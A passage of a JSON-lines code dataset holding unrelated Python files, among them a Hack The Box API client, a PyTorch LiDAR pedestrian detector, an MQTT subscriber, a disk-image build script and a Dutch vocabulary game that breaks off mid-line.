# except:\n # with open(\"failed_transformer.txt\", \"a\") as ft:\n # ft.write(\"{}\\n\".format(model_name))\n return\n\n# test('bert-base-cased')\n# test('bert-base-german-dbmdz-cased')\n# test('bert-base-german-dbmdz-uncased')\n# test('bert-base-japanese')\n# test('bert-base-japanese-char')\n# test('bert-base-japanese-char-whole-word-masking')\n# test('bert-base-japanese-whole-word-masking')\n# test('bert-base-multilingual-cased')\n# test('bert-base-uncased')\n# test('bert-large-cased')\n# test('bert-large-cased-whole-word-masking')\n# test('bert-large-cased-whole-word-masking-finetuned-squad')\n# test('bert-large-uncased')\n# test('bert-large-uncased-whole-word-masking')\n# test('bert-large-uncased-whole-word-masking-finetuned-squad')\n# test('distilbert-base-german-cased')\n# test('distilbert-base-multilingual-cased')\n# test('distilbert-base-uncased')\n# test('distilbert-base-uncased-distilled-squad')\n# test('gpt2')\n# test('gpt2-large')\n# test('gpt2-medium')\n# test('gpt2-xl')\n# test('openai-gpt')\n# test('roberta-base')\n# test('roberta-base-openai-detector')\n# test('roberta-large')\n# test('roberta-large-openai-detector')\n# test('transfo-xl-wt103')\n# test('xlm-clm-ende-1024')\n# test('xlm-clm-enfr-1024')\n# test('xlm-mlm-ende-1024')\n# test('xlm-mlm-enfr-1024')\n# test('xlm-mlm-tlm-xnli15-1024')\n# test('xlm-mlm-xnli15-1024')\n# test('xlnet-base-cased')\n# test('xlnet-large-cased')\n\n## the following is the 2020-04-12 newly added ones. \n# test('bert-base-finnish-cased-v1')\n# test('bert-base-cased-finetuned-mrpc')\n# test('distilbert-base-cased-distilled-squad')\n# test('roberta-large-mnli')\n# test('xlm-mlm-enro-1024')\n# test('distilgpt2')\n# test('bert-base-finnish-uncased-v1')\n# test('xlm-mlm-en-2048')\n# test('bert-base-multilingual-uncased')\n# test('bert-base-chinese')\n# test('xlm-mlm-100-1280')\n# test('distilroberta-base')\n# test('distilbert-base-cased')\ntest('xlm-mlm-17-1280')\ntest('bert-base-dutch-cased')\ntest('bert-base-german-cased')","repo_name":"XMK233/EMSE2020_MLPackage","sub_path":"Crawler/forPyTorchHub/crawler/crawler/4-huggingface_transformer.py","file_name":"4-huggingface_transformer.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42619497043","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 21 11:25:21 2016\n\n@author: u0107775\n\"\"\"\nimport pandas as pd\n\ntable = '/Users/u0107775/Data/Mitochondria_Deletion/Fastq/Fastq_files/pindel/testPipeline/testConfig.filter.txt'\noutput = '/Users/u0107775/Data/Mitochondria_Deletion/Fastq/Fastq_files/pindel/testPipeline/testConfig.calc.txt'\n\n# Read in the vcf to table file using both the tab and comma delimiters to split the allele counts\ndf = pd.read_csv(table, sep='\\t|,', engine='python')\n# Pandas only counts the number of columns that are tab delimited. Therefore write immediately to file and reload table\ndf.to_csv(output, sep='\\t')\n\n# Extract the general column names and then extract the sample specific column names\ncolHeader = list(df.columns.values)[0:7]\nsampleNames = list(df.columns.values)[7:]\n\n# Initialize a new column header and for each sample append reference and deletion names\nsampleCounts = []\nfor name in sampleNames:\n newName = name[:-3]\n refCounts = newName + '.REF'\n delCounts = newName + '.DEL'\n sampleCounts.append(refCounts)\n sampleCounts.append(delCounts)\n\n# Cncatenate the general and sample-specific column names\nnewHeader = colHeader + sampleCounts\n\n# Read in the fresh file that should have the correct number of columns.\ndf2 = pd.read_csv(output, sep='\\t', skiprows=1, header=None, index_col=False)\n# Replace with the new column headers and write to file\ndf2.columns = newHeader\n\n\n# Calculate the allele frequency\nfor column in df2:\n # Extract columns containing reference read counts\n if '.REF' in column:\n # Extract sample names\n sampleName = column[:-4]\n # Generate column headers for indexing based on sample name\n refReads = '{}.REF'.format(sampleName)\n delReads = '{}.DEL'.format(sampleName)\n # Convert the deletions to floating point number, otherwise integer division is performed\n numerator = df2[delReads].apply(float)\n denominator = (df2[refReads].apply(float)) + numerator\n # Write new column label\n columnLabel = sampleName + '_freq'\n # Perform allele frequency calculation\n df2[columnLabel] = (numerator / (numerator + df2[refReads]))\n\ndf2.to_csv(output, sep='\\t')","repo_name":"dvbrown/Pipelines","sub_path":"Ruffus_python/pindel_mtDNA/splitTablecomma.py","file_name":"splitTablecomma.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"7789040977","text":"\"\"\"\nExamples:\n Starting a challenge and submitting the flag::\n\n challenge = client.get_challenge(100)\n instance = challenge.start()\n r = remote(instance.ip, instance.port)\n # Do the challenge.....\n instance.stop()\n challenge.submit(flag, difficulty=50)\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport time\nfrom datetime import datetime\nfrom typing import List, Optional, cast, TYPE_CHECKING\n\nimport dateutil.parser\n\nfrom . import htb\nfrom .constants import DOWNLOAD_COOLDOWN\nfrom .errors import (\n IncorrectFlagException,\n IncorrectArgumentException,\n NoDockerException,\n NoDownloadException,\n RateLimitException,\n)\n\nif TYPE_CHECKING:\n from .htb import HTBClient\n from .user import User\n\n\nclass Challenge(htb.HTBObject):\n \"\"\"The class representing Hack The Box challenges\n\n Attributes:\n name (str): The name of the challenge\n retired: Whether the challenge is retired\n difficulty: The official difficulty of the challenge\n avg_difficulty: The average user-given difficulty\n points: The points awarded on completion\n difficulty_ratings: A dict of difficulty ratings given\n solves: The number of solves a challenge has\n likes: The number of likes a challenge has\n dislikes: The number of dislikes a challenge has\n release_date: The date the challenge was released\n solved: Whether the active user has completed the challenge\n is_liked: Whether the active user has liked the challenge\n is_disliked: Whether the active user has disliked the challenge\n\n description: The challenge description\n category: The name of the category\n has_download: Whether the challenge has a download available\n has_docker: Whether the challenge has a remote instance available\n\n \"\"\"\n\n name: str\n retired: bool\n difficulty: str\n avg_difficulty: int\n points: int\n difficulty_ratings = None\n solves: int\n likes: int\n dislikes: int\n release_date: datetime\n solved: bool\n is_liked: bool\n is_disliked: bool\n recommended: bool\n\n # noinspection PyUnresolvedReferences\n _authors: Optional[List[\"User\"]] = None\n _author_ids: List[int]\n\n _detailed_attributes = (\n \"description\",\n \"category\",\n \"has_download\",\n \"has_docker\",\n \"instance\",\n )\n description: str\n category: str\n has_download: bool\n has_docker: bool\n instance: Optional[DockerInstance]\n\n def submit(self, flag: str, difficulty: int):\n \"\"\"Submits a flag for a Challenge\n\n Args:\n flag: The flag for the Challenge\n difficulty: A rating between 10 and 100 of the Challenge difficulty.\n Must be a multiple of 10.\n\n \"\"\"\n if difficulty < 10 or difficulty > 100 or difficulty % 10 != 0:\n raise IncorrectArgumentException(\n reason=\"Difficulty must be a multiple of 10, between 10 and 100\"\n )\n\n submission = cast(\n dict,\n self._client.do_request(\n \"challenge/own\",\n json_data={\n \"flag\": flag,\n \"challenge_id\": self.id,\n \"difficulty\": difficulty,\n },\n ),\n )\n if submission[\"message\"] == \"Incorrect flag\":\n raise IncorrectFlagException\n return True\n\n def start(self) -> DockerInstance:\n \"\"\"\n Requests the challenge be started\n\n Returns:\n The DockerInstance that was started\n\n \"\"\"\n if not self.has_docker:\n raise NoDockerException\n instance = cast(\n dict,\n self._client.do_request(\n \"challenge/start\", json_data={\"challenge_id\": self.id}\n ),\n )\n # TODO: Handle failure to start\n self.instance = DockerInstance(\n instance[\"ip\"], instance[\"port\"], self.id, self._client, instance[\"id\"]\n )\n return self.instance\n\n def download(self, path=None) -> str:\n \"\"\"\n\n Args:\n path: The name of the zipfile to download to. If none is provided, it is saved to the current directory.\n\n Returns: The path of the file\n\n \"\"\"\n if not self.has_download:\n raise NoDownloadException\n if self._client.challenge_cooldown > time.time():\n raise RateLimitException(\n \"Challenge download ratelimit exceeded - please do not remove this\"\n )\n if path is None:\n path = os.path.join(os.getcwd(), f\"{self.name}.zip\")\n data = cast(\n bytes,\n self._client.do_request(f\"challenge/download/{self.id}\", download=True),\n )\n self._client.challenge_cooldown = int(time.time()) + DOWNLOAD_COOLDOWN\n with open(path, \"wb\") as f:\n f.write(data)\n return path\n\n # noinspection PyUnresolvedReferences\n @property\n def authors(self) -> List[\"User\"]:\n \"\"\"Fetch the author(s) of the Challenge\n\n Returns: List of Users\n\n \"\"\"\n if not self._authors:\n self._authors = []\n for uid in self._author_ids:\n self._authors.append(self._client.get_user(uid))\n return self._authors\n\n def __repr__(self):\n return f\"\"\n\n # noinspection PyUnresolvedReferences\n def __init__(self, data: dict, client: \"HTBClient\", summary: bool = False):\n \"\"\"Initialise a `Challenge` using API data\"\"\"\n self._client = client\n self._detailed_func = client.get_challenge # type: ignore\n self.id = data[\"id\"]\n self.name = data[\"name\"]\n self.retired = bool(data[\"retired\"])\n self.points = int(data[\"points\"])\n self.difficulty = data[\"difficulty\"]\n self.difficulty_ratings = data[\"difficulty_chart\"]\n self.solves = data[\"solves\"]\n self.solved = data[\"authUserSolve\"]\n self.likes = data[\"likes\"]\n self.dislikes = data[\"dislikes\"]\n self.release_date = dateutil.parser.parse(data[\"release_date\"])\n if not summary:\n self.description = data[\"description\"]\n self.category = data[\"category_name\"]\n self._author_ids = [data[\"creator_id\"]]\n if data[\"creator2_id\"]:\n self._author_ids.append(data[\"creator2_id\"])\n self.has_download = data[\"download\"]\n self.has_docker = data[\"docker\"]\n if data[\"docker_ip\"]:\n self.instance = DockerInstance(\n data[\"docker_ip\"], data[\"docker_port\"], self.id, self._client\n )\n else:\n self.instance = None\n else:\n self._is_summary = True\n\n\nclass DockerInstance:\n \"\"\"Representation of an active Docker container instance of a Challenge\n\n Attributes:\n container_id: The ID of the container\n port: The port the container is listening on\n ip: The IP the instance can be reached at\n chall_id: The connected challenge\n client: The passed-through API client\n\n \"\"\"\n\n id: str\n port: int\n ip: str\n chall_id: int\n client: htb.HTBClient\n\n def __init__(\n self,\n ip: str,\n port: int,\n chall_id: int,\n client: htb.HTBClient,\n container_id: str = None,\n ):\n self.client = client\n self.id = container_id or \"\"\n self.port = port\n self.ip = ip\n self.chall_id = chall_id\n\n def stop(self):\n \"\"\"Request the instance be stopped. Zeroes out all properties\"\"\"\n self.client.do_request(\n \"challenge/stop\", json_data={\"challenge_id\": self.chall_id}\n )\n # TODO: Handle failures to stop\n","repo_name":"0x4xel/HTNotes","sub_path":"hackthebox/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"27"} +{"seq_id":"21080565006","text":"import paho.mqtt.client as mqtt\nimport time\nimport json\n\nMQTT_HOST= \"broker.emqx.io\"\nMQTT_PORT = 1883\nMQTT_KEEPALIVE_INTERVAL = 60\n\nMQTT_SUB_TOPIC = \"mobile/gusdnr/sensing\"\n\ndef on_message(client, userdata, message):\n result = str(message.payload.decode(\"utf-8\"))\n sensing = json.loads(result)\n print(f\"temperature = {sensing['temperature']}\")\n print(f\"humidity = {sensing['humidity']}\")\n\nclient = mqtt.Client()\nclient.on_message = on_message\n\nclient.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)\nclient.subscribe(MQTT_SUB_TOPIC)\nclient.loop_start()\n\ntry:\n while True:\n time.sleep(5)\n print(\"Waiting\")\n \nexcept KeyboardInterrupt:\n print(\"I'm done!!\")\nfinally:\n client.disconnect\n","repo_name":"hw1203/python","sub_path":"mqtt/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14570754068","text":"import gmpy2, time\nstart_time = time.time()\n\ntruncatable_primes = []\nn_test = 11\nstep = 2\n\nwhile len(truncatable_primes) < 11:\n\n\tif gmpy2.is_prime(n_test):\n\t\ttruncatable_prime = True\n\t\tfor i in range(1, len(str(n_test))):\n\t\t\tif not gmpy2.is_prime(int(str(n_test)[i:])) or \\\n\t\t\tnot gmpy2.is_prime(int(str(n_test)[:-i])):\n\t\t\t\ttruncatable_prime = False\n\t\t\t\tbreak\n\n\t\tif truncatable_prime:\n\t\t\ttruncatable_primes.append(n_test)\n\n\tn_test += step\n\tstep = 2 if step==4 else 4\n\nprint()\nprint('sum of left/right truncatable primes: '+ str(sum(truncatable_primes)))\nprint('runtime: %s sec' % (time.time() - start_time))\nprint()\n","repo_name":"johnakitto/project_euler","sub_path":"euler_037.py","file_name":"euler_037.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6633398149","text":"from math import ceil\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass DrSpaam(nn.Module):\n def __init__(\n self,\n dropout=0.5,\n num_pts=48,\n alpha=0.5,\n embed_len=128,\n win_size=7,\n pano_scan=False,\n cls_loss=None,\n ):\n super(DrSpaam, self).__init__()\n\n self.dropout = dropout\n\n # backbone\n self.conv_u1 = nn.Sequential(\n self._conv_1d(1, 64), self._conv_1d(64, 64), self._conv_1d(64, 128)\n )\n self.conv_u2 = nn.Sequential(\n self._conv_1d(128, 128), self._conv_1d(128, 128), self._conv_1d(128, 256)\n )\n self.conv_u3 = nn.Sequential(\n self._conv_1d(256, 256), self._conv_1d(256, 256), self._conv_1d(256, 512)\n )\n self.conv_u4 = nn.Sequential(self._conv_1d(512, 256), self._conv_1d(256, 128))\n\n # detection layer\n self.head_cls = nn.Conv1d(128, 1, kernel_size=1)\n self.head_reg = nn.Conv1d(128, 2, kernel_size=1)\n\n # spatial attention\n self.spatial_attention_memory = _SpatialAttentionMemory(\n n_pts=int(ceil(num_pts / 4)),\n n_channel=256,\n embed_len=embed_len,\n alpha=alpha,\n win_size=win_size,\n pano_scan=pano_scan,\n )\n\n # initialize weights\n for idx, module in enumerate(self.modules()):\n if isinstance(module, (nn.Conv1d, nn.Conv2d)):\n nn.init.kaiming_normal_(module.weight, a=0.1, nonlinearity=\"leaky_relu\")\n elif isinstance(module, (nn.BatchNorm1d, nn.BatchNorm2d)):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def forward(self, signal, inference=False):\n\n n_bs, n_cutout, n_scan, n_pc = signal.shape\n\n if not inference:\n self.spatial_attention_memory.reset()\n\n # process scan sequentially\n n_scan = signal.shape[2]\n for i in range(n_scan):\n signal_i = signal[:, :, i, :] # (bs, cutout, pc)\n\n # extract feature from current scan\n flow = signal_i.view(n_bs * n_cutout, 1, n_pc)\n flow = self._conv_et_pool_1d(flow, self.conv_u1) # /2\n flow = self._conv_et_pool_1d(flow, self.conv_u2) # /4\n flow = flow.view(n_bs, n_cutout, flow.shape[-2], flow.shape[-1]) # (bs, cutout, C, pc)\n\n # combine current feature with memory\n flow, sim_score = self.spatial_attention_memory(flow) # (bs, cutout, C, pc)\n\n # detection using combined feature memory\n flow = flow.view(n_bs * n_cutout, flow.shape[-2], flow.shape[-1])\n flow = self._conv_et_pool_1d(flow, self.conv_u3) # /8\n flow = self.conv_u4(flow)\n flow = F.avg_pool1d(flow, kernel_size=flow.shape[-1]) # (bs * cutout, C, 1)\n\n pred_cls = self.head_cls(flow).view(n_bs, n_cutout, -1) # (bs, cutout, cls)\n pred_reg = self.head_reg(flow).view(n_bs, n_cutout, 2) # (bs, cutout, 2)\n\n return pred_cls, pred_reg, sim_score\n\n def _conv_et_pool_1d(self, signal, conv_block):\n flow = conv_block(signal)\n flow = F.max_pool1d(flow, kernel_size=2)\n if self.dropout > 0:\n flow = F.dropout(flow, p=self.dropout, training=self.training)\n\n return flow\n\n def _conv_1d(self, in_channel, out_channel):\n return nn.Sequential(\n nn.Conv1d(in_channel, out_channel, kernel_size=3, padding=1),\n nn.BatchNorm1d(out_channel),\n nn.LeakyReLU(negative_slope=0.1, inplace=True),\n ) \n\n\nclass _SpatialAttentionMemory(nn.Module):\n def __init__(\n self, n_pts, n_channel, embed_len, alpha, win_size, pano_scan\n ):\n \n super(_SpatialAttentionMemory, self).__init__()\n self._alpha = alpha\n self._win_size = win_size\n self._embed_len = embed_len\n self._pano_scan = pano_scan\n\n self.atten_mem = None\n self.neighbour_masks = None\n self.neighbour_inds = None\n\n self.custom_conv = nn.Sequential(\n nn.Conv1d(n_channel, self._embed_len, kernel_size=n_pts, padding=0),\n nn.BatchNorm1d(self._embed_len),\n nn.LeakyReLU(negative_slope=0.1, inplace=True),\n )\n\n for idx, module in enumerate(self.modules()):\n if isinstance(module, (nn.Conv1d, nn.Conv2d)):\n nn.init.kaiming_normal_(module.weight, a=0.1, nonlinearity=\"leaky_relu\")\n elif isinstance(module, (nn.BatchNorm1d, nn.BatchNorm2d)):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def reset(self):\n self.atten_mem = None\n\n def forward(self, sig_new):\n if self.atten_mem is None:\n self.atten_mem = sig_new\n return self.atten_mem, None\n\n n_batch, n_cutout, n_channel, n_pts = sig_new.shape\n\n \n self.neighbour_masks, self.neighbour_inds = self._generate_neighbour_masks(\n sig_new\n )\n\n embed_x = self.custom_conv(\n sig_new.view(-1, n_channel, n_pts)\n ).view(-1, n_cutout, self._embed_len)\n\n \n embed_tmp = self.custom_conv(\n self.atten_mem.view(-1, n_channel, n_pts)\n ).view(-1, n_cutout, self._embed_len)\n\n # pair-wise similarity (batch, cutout, cutout)\n sim_score = torch.matmul(embed_x, embed_tmp.permute(0, 2, 1))\n\n # masked softmax\n sim_score = sim_score - 1e10 * (1.0 - self.neighbour_masks)\n max_sim = sim_score.max(dim=-1, keepdim=True)[0]\n exp_sim = torch.exp(sim_score - max_sim) * self.neighbour_masks\n exps_sum = exp_sim.sum(dim=-1, keepdim=True)\n sim_score = exp_sim / exps_sum\n\n # weighted average on the template\n atten_mem = self.atten_mem.view(n_batch, n_cutout, -1)\n atten_mem_w = torch.matmul(sim_score, atten_mem).view(-1, n_cutout, n_channel, n_pts)\n\n # update memory using auto-regressive\n self.atten_mem = self._alpha * sig_new + (1.0 - self._alpha) * atten_mem_w\n\n return self.atten_mem, sim_score\n\n def _generate_neighbour_masks(self, sig):\n \n n_cutout = sig.shape[1]\n half_ws = int(self._win_size / 2)\n inds_col = torch.arange(n_cutout).unsqueeze(dim=-1).long()\n win_inds = torch.arange(-half_ws, half_ws + 1).long()\n inds_col = inds_col + win_inds.unsqueeze(dim=0) # (cutout, neighbours)\n \n inds_col = (\n inds_col % n_cutout\n if self._pano_scan and not self.training\n else inds_col.clamp(min=0, max=n_cutout - 1)\n )\n inds_row = torch.arange(n_cutout).unsqueeze(dim=-1).expand_as(inds_col).long()\n inds_full = torch.stack((inds_row, inds_col), dim=2).view(-1, 2)\n\n nb_masks = torch.zeros(n_cutout, n_cutout).float()\n nb_masks[inds_full[:, 0], inds_full[:, 1]] = 1.0\n return nb_masks.cuda(sig.get_device()) if sig.is_cuda else nb_masks, inds_full\n","repo_name":"Ascend/ascend_community_projects","sub_path":"2D_LiDAR_Pedestrain_Detection/LaserDet/srcs/nets/dr_spaam.py","file_name":"dr_spaam.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"37709136253","text":"from datetime import timedelta\n\nimport factory.fuzzy\nfrom django.utils import timezone\n\nfrom poradnia.cases.factories import CaseFactory\nfrom poradnia.users.factories import UserFactory\n\n\nclass EventFactory(factory.django.DjangoModelFactory):\n text = factory.Sequence(\"event-text-{}\".format)\n deadline = True\n time = factory.fuzzy.FuzzyDateTime(timezone.now())\n created_by = factory.SubFactory(UserFactory)\n created_on = factory.fuzzy.FuzzyDateTime(timezone.now() - timedelta(hours=5))\n case = factory.SubFactory(CaseFactory)\n\n class Meta:\n model = \"events.Event\"\n\n\nclass ReminderFactory(factory.django.DjangoModelFactory):\n user = factory.SubFactory(UserFactory)\n event = factory.SubFactory(EventFactory)\n\n class Meta:\n model = \"events.Reminder\"\n","repo_name":"watchdogpolska/poradnia","sub_path":"poradnia/events/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"13330500060","text":"\"\"\"Main script to build the website from jinja templates.\"\"\"\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\n\nenv = Environment(\n loader=FileSystemLoader(searchpath=\"./templates/\"),\n autoescape=select_autoescape()\n)\n\nif __name__ == \"__main__\":\n # pages to build\n pages = [\n \"index.html\",\n \"supported-devices.html\",\n \"faq.html\",\n \"download.html\",\n \"imprint.html\",\n \"privacy.html\",\n \"feedback.html\",\n \"404.html\",\n ]\n\n # Load template files and write the rendered HTML\n for page in pages:\n # render the templates\n template = env.get_template(page)\n output = template.render(\n version=\"v0.5.0-beta\",\n n_supported_devices=73,\n )\n\n # write to file\n with open(f\"public/{page}\", \"w\") as html_output:\n html_output.write(output)\n","repo_name":"openandroidinstaller-dev/openandroidinstaller-dev.github.io","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"6626100073","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport tempfile\nimport subprocess\nimport re\nimport platform\n\nSCRIPT_DIR = os.path.dirname(__file__)\nSOURCE_ROOT = os.path.join(SCRIPT_DIR, '..')\n\nsys.path.append(os.path.join(SOURCE_ROOT, 'scripts'))\nimport anillo_util\n\nif len(sys.argv) != 8:\n\tprint('Usage: ' + sys.argv[0] + ' ')\n\tsys.exit(1)\n\nARCH = sys.argv[1]\nUEFI_BOOTSTRAP_PATH = sys.argv[2]\nKERNEL_PATH = sys.argv[3]\nUEFI_SCRIPT_PATH = sys.argv[4]\nCONFIG_PATH = sys.argv[5]\nRAMDISK_PATH = sys.argv[6]\nOUTPUT_IMAGE_PATH = sys.argv[7]\n\nARCH_MAP = {\n\t'x86_64': 'BOOTx64.efi',\n\t'aarch64': 'BOOTaa64.efi',\n}\n\nEFI_SIZE_MB = 64\nDISK_SIZE_MB = 1024\n\nmount_dir = tempfile.TemporaryDirectory()\n\nif os.path.exists(OUTPUT_IMAGE_PATH):\n\tos.remove(OUTPUT_IMAGE_PATH)\n\ndef partfs_mount():\n\tanillo_util.run_or_fail(['partfs', '-o', 'dev=' + OUTPUT_IMAGE_PATH, mount_dir.name])\n\ndef partfs_unmount():\n\tif platform.system() == 'Darwin':\n\t\tanillo_util.run_or_fail(['umount', mount_dir.name])\n\telse:\n\t\tanillo_util.run_or_fail(['fusermount', '-u', mount_dir.name])\n\ndef fat_mkdir_p(image, path):\n\tcurr_path = ''\n\tfor component in path.split(os.sep):\n\t\tcurr_path = os.path.join(curr_path, component)\n\t\tif subprocess.call(['mdir', '-i', image, '::' + curr_path], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) != 0:\n\t\t\tanillo_util.run_or_fail(['mmd', '-i', image, '::' + curr_path])\n\ndef fat_copy(image, source, dest):\n\tanillo_util.run_or_fail(['mcopy', '-D', 'o', '-i', image, source, '::' + dest])\n\nanillo_util.run_or_fail(['qemu-img', 'create', '-f', 'raw', OUTPUT_IMAGE_PATH, str(DISK_SIZE_MB) + 'M'])\n\nanillo_util.run_or_fail(['sgdisk', '-o', OUTPUT_IMAGE_PATH])\n\nimage_info = subprocess.check_output(['sgdisk', '-p', OUTPUT_IMAGE_PATH]).decode()\n\nsector_size = int(re.search(r'Sector size \\(logical\\): ([0-9]+).*', image_info).group(1))\nfirst_sector = int(re.search(r'First usable sector is ([0-9]+).*', image_info).group(1))\nsector_alignment = int(re.search(r'Partitions will be aligned on ([0-9]+).*', image_info).group(1))\n\nfirst_aligned_sector = anillo_util.round_up_to_multiple(first_sector, sector_alignment)\nefi_sector_count = int((EFI_SIZE_MB * 1024 * 1024) / sector_size)\nlast_efi_sector = first_aligned_sector + efi_sector_count\n\nanillo_util.run_or_fail(['sgdisk', '-o', '-n', '1:' + str(first_aligned_sector) + ':' + str(last_efi_sector), '-t', '1:0700', OUTPUT_IMAGE_PATH])\n\npartfs_mount()\n\nefi_image_path = os.path.join(mount_dir.name, 'p1')\n\nanillo_util.run_or_fail(['mkfs.fat', efi_image_path])\n\nfat_mkdir_p(efi_image_path, 'EFI/anillo')\nfat_mkdir_p(efi_image_path, 'EFI/BOOT')\n\nfat_copy(efi_image_path, UEFI_SCRIPT_PATH, 'startup.nsh')\nfat_copy(efi_image_path, CONFIG_PATH, 'EFI/anillo/config.txt')\nfat_copy(efi_image_path, UEFI_BOOTSTRAP_PATH, 'EFI/anillo/ferro-bootstrap.efi')\nfat_copy(efi_image_path, UEFI_BOOTSTRAP_PATH, 'EFI/BOOT/' + ARCH_MAP[ARCH])\nfat_copy(efi_image_path, KERNEL_PATH, 'EFI/anillo/ferro')\nfat_copy(efi_image_path, RAMDISK_PATH, 'EFI/anillo/ramdisk')\n\npartfs_unmount()\n","repo_name":"anillo-os/anillo-os","sub_path":"scripts/build-image.py","file_name":"build-image.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"7640453349","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport random\nfrom sqlite3 import Error\nimport tkinter\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nfrom gtts import gTTS\nimport os\nfrom playsound import playsound\nimport os.path\nfrom pathlib import Path\nfrom os import listdir\nfrom os.path import isfile, join\nfrom random import randrange\nimport time\nimport googletrans\nfrom googletrans import Translator\nfrom google_trans_new import google_translator\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\n\n####DO ZROBIENIA:\n #konwersja mp3 do bitow, zeby nie zapisywac\n #wybor kazdego jezyka swiata\n #zaznaczanie niewlasciwych tlumaczen\n\nlistajezykow = googletrans.LANGUAGES\nprint(googletrans.LANGUAGES)\n\n\nvalues = listajezykow.values()\nvalues_list = list(values)\nprint(values_list)\n\n\ntranslator = google_translator()\ntranslate_text = translator.translate('Hola mundo!', lang_src='nl', lang_tgt='en')\nprint(translate_text)\n\n\nclass gierka:\n language = 'nl'\n\n\n\n def random_line():\n mypath = \"img/\"\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n a = random.choice(onlyfiles)\n b = os.path.splitext(a)[0]\n\n #stare i chujowe, to wyzej bierze z nazwy jotpegow\n #lines = open('dodane.txt').read().splitlines()\n # myline = random.choice(lines)\n # print(myline)\n return b\n\n #wyjebalem sejwowanie jako osobne pliki, teraz sejwuje jako jeden tymczasowy i usuwa i dziala w kazdym jezyku\n def tts(slowko, jezyk):\n jezyk = gierka.language\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt=jezyk.format())\n #return\n\n if jezyk == 'en':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='en')\n\n if jezyk == 'de':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='de')\n\n if jezyk == 'nl':\n gierka.mytext = slowko\n\n if jezyk == 'pl':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='pl')\n\n\n #mytext = slowko\n ####BARDZO WAZNE PONIZEJ USUNAC KOMENTARZ\n #language = 'nl'\n #if gierka.language == 'en':\n #print(gierka.mytext)\n\n\n #adres = ('sounds/{}.mp3'.format(gierka.mytext))\n adres = 'sounds/rozwiazanie.mp3'.format()\n myobj = gTTS(text=gierka.mytext, lang=gierka.language, slow=False)\n #if os.path.isfile(adres) == False:\n # print('yo')\n\n # my_file = Path(\"{}\".format(adres))\n # if my_file.exists() == False:\n # myobj.save(adres)\n # print('ks')\n myobj.save(adres)\n\n # file exists\n playsound(adres)\n os.remove(adres)\n\n\n #def klik():\n # for widget in frame.winfo_children():\n # widget.destroy()\n # frame.pack_forget()\n #okienko()\n\n\n def okienko():\n #global czy\n # def klik():\n # for widget in frame.winfo_children():\n # widget.destroy()\n # frame.pack_forget()\n #okienko()\n\n window = Tk()\n def lewy():\n if gierka.czy == 0:\n n = 'Ja, super!'\n gierka.tts(n, gierka.language)\n gierka.czy = None\n ramka()\n return\n\n if gierka.czy == 1:\n n = 'Nee. Probeer opnieuw'\n gierka.tts(n, gierka.language)\n return\n\n\n def prawy(event=None):\n\n if gierka.czy == 1:\n #global czy\n n = 'Ja, super!'\n gierka.tts(n, gierka.language)\n gierka.czy = None\n ramka()\n return\n #okienko()\n\n if gierka.czy == 0:\n\n n = 'Nee. Probeer opnieuw'\n gierka.tts(n, gierka.language)\n return\n\n\n # def losowanieslow():\n\n # a = gierka.random_line()\n # a2 = gierka.random_line()\n # if a2 == a:\n # a2 = gierka.random_line()\n #if a2 == a:\n # a2 = gierka.random_line()\n #if a2 == a:\n # a2 = gierka.random_line()\n # if a2 == a:\n # a2 = gierka.random_line()\n\n # ktoreslowko = randrange(2)\n # print(randrange(2))\n # return a,a2,ktoreslowko\n\n def setanylanguage():\n gierka.language = value_to_key(cb.get())\n print(gierka.language)\n ramka()\n return\n\n def setnl():\n gierka.language = 'nl'\n ramka()\n return\n\n def setang():\n gierka.language = 'en'\n ramka()\n return\n\n def setde():\n gierka.language = 'de'\n ramka()\n return\n\n def setpl():\n gierka.language = 'pl'\n ramka()\n return\n\n def ramka():\n ktoreslowko = randrange(2)\n print(randrange(2))\n\n gierka.czy = ktoreslowko\n\n #self.czy = None\n frame = Frame(window)\n for widget in frame.winfo_children():\n widget.destroy()\n frame.place_forget()\n #frame.grid_forget()\n frame.place(x=20, y=50)\n a=gierka.random_line()\n\n #obrazekLabel2.unbind('')\n\n\n slowkoLabel = Label(frame, text='{}'.format(a))\n slowkoLabel.grid(row=2, column=1)\n\n\n image 